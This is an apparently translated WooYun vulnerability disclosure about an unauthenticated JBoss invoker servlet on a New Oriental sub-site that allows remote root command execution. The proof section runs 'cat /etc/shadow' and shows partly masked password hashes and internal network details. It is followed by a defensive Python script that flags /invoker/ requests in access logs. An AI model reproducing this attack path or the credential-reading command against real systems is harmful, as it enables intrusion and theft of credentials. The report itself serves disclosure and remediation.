Vulnerability summary (24 followers)

Defect ID: wooyun-2013-042108

Title: Arbitrary command execution vulnerability on a New Oriental sub-site (internal network penetration demonstrated)

Vendor: 新东方 (New Oriental)

Author: 猪猪侠

Submitted: 2013-11-06 10:34

Fixed: 2013-12-21 10:34

Published: 2013-12-21 10:34

Vulnerability type: Improper system/service operations configuration

Severity: High

Self-assessed Rank: 20

Vulnerability status: Vendor confirmed

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2013-11-06: Details sent to the vendor, awaiting vendor handling
2013-11-06: Vendor confirmed; details disclosed to the vendor only
2013-11-16: Details disclosed to core white hats and relevant domain experts
2013-11-26: Details disclosed to regular white hats
2013-12-06: Details disclosed to intern white hats
2013-12-21: Details disclosed to the public

Brief description:

Testing found that a New Oriental sub-site carries a serious command execution risk that allows direct penetration of the internal network.

Details:

# Problem description
Site: http://400.xdf.cn/
The JBoss invoker/JMXInvokerServlet interface is left unprotected, so commands can be executed remotely without authentication. The impact is about the same as the previously reported WooYun: 新东方某分站任意命令执行漏洞 (内网渗透危害较大请尽快修复) (Arbitrary command execution vulnerability on a New Oriental sub-site; significant internal network penetration risk, please fix as soon as possible).
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE remote deployment vulnerability.
http://www.exploit-db.com/exploits/28713/

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
Set-Cookie: JSESSIONID=59F063BFB81065333461B9282E80F72B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 28
Date: Wed, 06 Nov 2013 02:20:36 GMT
Connection: close
uid=0(root) gid=0(root)

Proof of vulnerability:

# Proof of vulnerability, on the internal network
cat /etc/shadow

root:$1$vIHoh5FZ$N/ET.***************:15524:0:99999:7:::
bin:*:12088:0:99999:7:::
daemon:*:12088:0:99999:7:::
adm:*:12088:0:99999:7:::
lp:*:12088:0:99999:7:::
sync:*:12088:0:99999:7:::
shutdown:*:12088:0:99999:7:::
halt:*:12088:0:99999:7:::
mail:*:12088:0:99999:7:::
news:*:12088:0:99999:7:::
uucp:*:12088:0:99999:7:::
operator:*:12088:0:99999:7:::
games:*:12088:0:99999:7:::
gopher:*:12088:0:99999:7:::
ftp:*:12088:0:99999:7:::
nobody:*:12088:0:99999:7:::
rpm:!!:12088:0:99999:7:::
apache:!!:12088:0:99999:7:::
mailnull:!!:12088:0:99999:7:::
smmsp:!!:12088:0:99999:7:::
distcache:!!:12088:0:99999:7:::
ntp:!!:12088:0:99999:7:::
nscd:!!:12088:0:99999:7:::
vcsa:!!:12088:0:99999:7:::
rpc:!!:12088:0:99999:7:::
rpcuser:!!:12088:0:99999:7:::
nfsnobody:!!:12088:0:99999:7:::
sshd:!!:12088:0:99999:7:::
postgres:!!:12088:0:99999:7:::
webalizer:!!:12088:0:99999:7:::
dovecot:!!:12088:0:99999:7:::
squid:!!:12088:0:99999:7:::
mysql:!!:12088:0:99999:7:::
pcap:!!:12088:0:99999:7:::
xfs:!!:12088:0:99999:7:::
dbus:!!:12088:0:99999:7:::
haldaemon:!!:12088:0:99999:7:::
avahi:!!:12088:0:99999:7:::
named:!!:12088:0:99999:7:::
gdm:!!:12088:0:99999:7:::
sabayon:!!:12088:0:99999:7:::
ADMIN:$1$ZbDyElMt$***************/:15524:0:99999:7:::
admin:$1$Z0yJnxXC$***************.:15004:0:99999:7:::
supervisor:$1$HOoFI6v6$***************/:15014:0:99999:7:::


eth0      Link encap:Ethernet  HWaddr 00:50:56:8B:1E:04  
inet addr:192.168.1.241 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe8b:1e04/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:15467918 errors:0 dropped:0 overruns:0 frame:0
TX packets:1374849 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6496067548 (6.0 GiB) TX bytes:906297121 (864.3 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:483696 errors:0 dropped:0 overruns:0 frame:0
TX packets:483696 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:465752892 (444.1 MiB) TX bytes:465752892 (444.1 MiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

Remediation:

# Remove the interface
# Configure access control on the middleware and deny web access to the /invoker directory
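The report's root cause (the JBoss /invoker/ servlets reachable from the web, accepting a marshalled object in a POST body) and its remediation (deny web access to /invoker) both leave a trace in the web server access log: before the fix, invoker requests return 200 (or 500 if the servlet throws); after the fix, they return 403 or 404. The following script is an added example and is not part of the original WooYun report or of any JBoss tooling. It parses combined-format access log lines, flags invoker traffic, grades each hit, and extracts the JBoss version from the X-Powered-By banner shown in the report. The log lines are constructed samples with documentation-range IP addresses; the assumption is that the deployment uses the stock /invoker context path.

```python
"""Flag JBoss invoker traffic in access logs and fingerprint JBoss from banners.

Added example (not from the original report). Sample log lines below are
constructed; the X-Powered-By header is the one quoted in the report.
"""
import re
from collections import Counter

# Stock JBoss 4.x http-invoker.sar deploys its servlets under /invoker/.
# Assumption: the target was not redeployed under a different context.
INVOKER_PREFIX = "/invoker/"

# Statuses showing the request was refused before it reached the servlet;
# this is what the access control in the remediation should produce.
BLOCKED_STATUSES = {401, 403, 404}

# Combined/common log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample: one benign hit, probes, two POSTs, and two blocked hits.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Nov/2013:10:20:36 +0800] "GET /index.jsp HTTP/1.1" 200 5120
203.0.113.7 - - [06/Nov/2013:10:20:36 +0800] "HEAD /invoker/JMXInvokerServlet HTTP/1.1" 200 0
198.51.100.9 - - [06/Nov/2013:10:21:02 +0800] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 28
198.51.100.9 - - [06/Nov/2013:10:21:05 +0800] "POST /invoker/EJBInvokerServlet HTTP/1.1" 500 2200
192.0.2.5 - - [06/Nov/2013:10:22:00 +0800] "GET /invoker/readonly HTTP/1.1" 404 970
203.0.113.7 - - [06/Nov/2013:10:25:00 +0800] "POST /invoker/JMXInvokerServlet HTTP/1.1" 403 0
"""

# Header quoted in the report's HTTP response.
REPORTED_BANNER = ("X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA "
                   "(build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0")


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Severity for one parsed entry, or None when it is not invoker traffic."""
    if not entry["path"].startswith(INVOKER_PREFIX):
        return None
    if entry["status"] in BLOCKED_STATUSES:
        return "info"       # access control refused the request
    if entry["method"] == "POST":
        return "critical"   # a POST body is how the marshalled object arrives
    return "high"           # endpoint reachable: probing or fingerprinting


def scan_log(text):
    """Return a list of findings (ip, method, path, status, severity) for invoker hits."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        severity = classify(entry)
        if severity is not None:
            findings.append({
                "ip": entry["ip"], "method": entry["method"],
                "path": entry["path"], "status": entry["status"],
                "severity": severity,
            })
    return findings


def summarize(findings):
    """Count findings per (source ip, severity) for triage."""
    return Counter((f["ip"], f["severity"]) for f in findings)


def jboss_version(raw_headers):
    """Pull the JBoss version out of an X-Powered-By banner, or None."""
    m = re.search(r"JBoss-([0-9][\w.]*)", raw_headers)
    return m.group(1) if m else None


if __name__ == "__main__":
    print("JBoss version from banner:", jboss_version(REPORTED_BANNER))
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['severity']:8} {f['ip']:14} {f['method']:5} {f['status']} {f['path']}")
    print(dict(summarize(results)))
```

Run over a real log the script answers two questions the report raises: whether anyone reached the invoker servlets before the fix (any "critical" or "high" entry), and whether the access control applied afterwards actually blocks them (only "info" entries remain). A 500 on a POST is graded critical as well, because the servlet still processed the body before failing.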

Copyright notice: please credit the source when reposting: 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed at: 2013-11-06 11:06

Vendor reply:

Thank you for the information; we will fix it as soon as possible.

Latest status:

None yet